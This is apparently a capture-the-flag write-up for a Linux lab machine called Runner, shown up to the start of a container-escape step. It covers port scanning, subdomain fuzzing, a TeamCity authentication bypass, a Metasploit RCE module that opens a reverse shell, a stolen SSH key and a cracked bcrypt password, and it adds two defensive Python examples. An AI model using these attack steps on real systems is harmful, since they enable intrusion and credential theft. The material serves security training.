Runner

OS: Linux
Difficulty: Medium
Points: 30

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.238.77 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.238.77
Nmap scan report for 10.129.238.77
Host is up, received reset ttl 63 (0.13s latency).
Scanned at 2024-04-23 02:46:41 EDT for 11s

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp   open  http        syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Enumerating subdomains, we find the following one.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb" -u http://runner.htb -fw 4
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://runner.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.runner.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 4
________________________________________________

teamcity                [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 490ms]

We can see that the TeamCity application is exposed there, along with its version.
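From the defender's side, the vhost brute force above leaves a distinctive trace: one client sending many different Host headers within seconds. The following is an added example (not part of the original writeup) that flags that pattern over constructed nginx log lines; it assumes a hypothetical log_format that records $host, since the default combined format does not.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed (hypothetical) nginx log_format that records $host:
#   '$remote_addr [$time_local] "$host" "$request" $status'
LINE_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<host>[^"]*)" '
                     r'"(?P<req>[^"]*)" (?P<status>\d{3})$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def detect_vhost_fuzzing(lines, window_seconds=60, min_distinct_hosts=20):
    """Return {client_ip: max distinct Host values seen in any window} for clients
    over the threshold; ffuf -H "Host: FUZZ.domain" is one source, many Hosts."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            events[rec["ip"]].append((rec["ts"], rec["host"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans <= window_seconds
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = len({h for _, h in evs[start:end + 1]})
            if distinct >= min_distinct_hosts:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged

def sample_log():
    """Constructed sample: one client probing 25 subdomains in 25 s, one normal client."""
    lines = [f'10.10.14.5 [23/Apr/2024:02:50:{i:02d} -0400] "w{i}.runner.htb" '
             f'"GET / HTTP/1.1" 404' for i in range(25)]
    lines.append('10.10.14.9 [23/Apr/2024:02:50:00 -0400] "runner.htb" "GET / HTTP/1.1" 200')
    lines.append('10.10.14.9 [23/Apr/2024:02:51:30 -0400] "runner.htb" "GET /index.html HTTP/1.1" 200')
    return lines
```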

TeamCity Auth Bypass (CVE-2024-27198)

Researching vulnerabilities in that version, we notice that it is possible to create an account for ourselves with the following script in order to access the application.

python3 CVE-2024-27198.py -t http://teamcity.runner.htb -u doom -p doom
[+] Version Found:  2023.05.3 (build 129390)
[+] Server vulnerable, returning HTTP 200
[+] New user doom created succesfully! Go to http://teamcity.runner.htb/login.html to login with your new credentials :)

It is also possible to obtain RCE with this same vulnerability.

msfconsole
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set rhosts teamcity.runner.htb
set rport 80
set lhost tun0
run

SSH Keys

We can find an RSA private key in the projects.

cat data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys

It is also possible to obtain it from the web page.

We can use that key to connect over SSH as the user john.

chmod 400 id_rsa
ssh -i id_rsa john@10.129.238.77
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

john@runner:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)

Lateral Movement

Reviewing the TeamCity files from the first shell, we obtain the hash of the user matthew.

meterpreter > download /data/teamcity_server/datadir/system/buildserver.data
[*] Downloading: /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Downloaded 512.00 KiB of 512.00 KiB (100.0%): /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Completed  : /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
strings buildserver.data | grep -A 5 matthew
matthew
<$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
Matthew
matthew@runner.htb
BCRYPT
hasSeenExperimentalOverview

Crack hash

We use john to obtain the password.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
piper123         (?)     
1g 0:00:01:21 DONE (2024-04-23 04:48) 0.01221g/s 635.7p/s 635.7c/s 635.7C/s playboy93..onelife
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
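The strings | grep step in the lateral-movement section carves the bcrypt hash out of the binary file by eye, and john's "iteration count is 128" line explains why it cracked in 81 seconds. The added example below (not part of the original writeup) does both programmatically: it carves bcrypt strings from a constructed byte blob built around the hash shown above, parses the modular-crypt fields, and flags low work factors (cost 7 is 2^7 = 128 rounds). The second hash in the sample and the admin record are made up for contrast.

```python
import re

# bcrypt modular-crypt format: $2<v>$<cost>$<22-char salt><31-char hash>,
# both encoded in bcrypt's base64 alphabet ./A-Za-z0-9
BCRYPT_RE = re.compile(rb"\$2[abxy]\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})")

def carve_bcrypt_hashes(blob):
    """Return every bcrypt hash embedded in raw bytes, the programmatic
    version of the `strings | grep` step (works even when the hash is glued
    to other bytes, like the '<' prefix seen in buildserver.data)."""
    return [m.group(0).decode() for m in BCRYPT_RE.finditer(blob)]

def parse_bcrypt(h):
    """Split a bcrypt string into version, cost, derived round count, salt and hash."""
    m = BCRYPT_RE.fullmatch(h.encode())
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h)
    cost = int(m.group(1))
    return {"version": h[1:3], "cost": cost, "iterations": 2 ** cost,
            "salt": m.group(2).decode(), "hash": m.group(3).decode()}

def audit_bcrypt(blob, min_cost=10):
    """Carve and parse every hash, flagging those below min_cost
    (cost 7 = 128 rounds, as john reported; 10 or more is the usual floor today)."""
    out = []
    for h in carve_bcrypt_hashes(blob):
        p = parse_bcrypt(h)
        p["weak"] = p["cost"] < min_cost
        out.append(p)
    return out

# Constructed sample blob mimicking the buildserver.data layout: the first hash is
# the one shown in the writeup, the second is a made-up cost-12 hash for contrast.
SAMPLE_BLOB = (
    b"\x00\x07matthew\x00<$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em"
    b"\x00Matthew\x00matthew@runner.htb\x00BCRYPT\x00"
    b"\x00\x05admin\x00<$2a$12$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"
    b"\x00Admin\x00BCRYPT\x00"
)

if __name__ == "__main__":
    for p in audit_bcrypt(SAMPLE_BLOB):
        print(p["cost"], p["iterations"], "WEAK" if p["weak"] else "ok", p["salt"])
```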

Privilege Escalation

In the hosts file we find a new subdomain.

john@runner:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 runner runner.htb teamcity.runner.htb portainer-administration.runner.htb

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

We add it to our own hosts file and reach a web portal.

We can authenticate with matthew's credentials.

matthew : piper123

After researching and trying several things, we arrive at this article, which explains how a Docker vulnerability can be exploited to escape the sandbox.

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd

First we create a container with the following characteristics.

We deploy the container and can now access the console.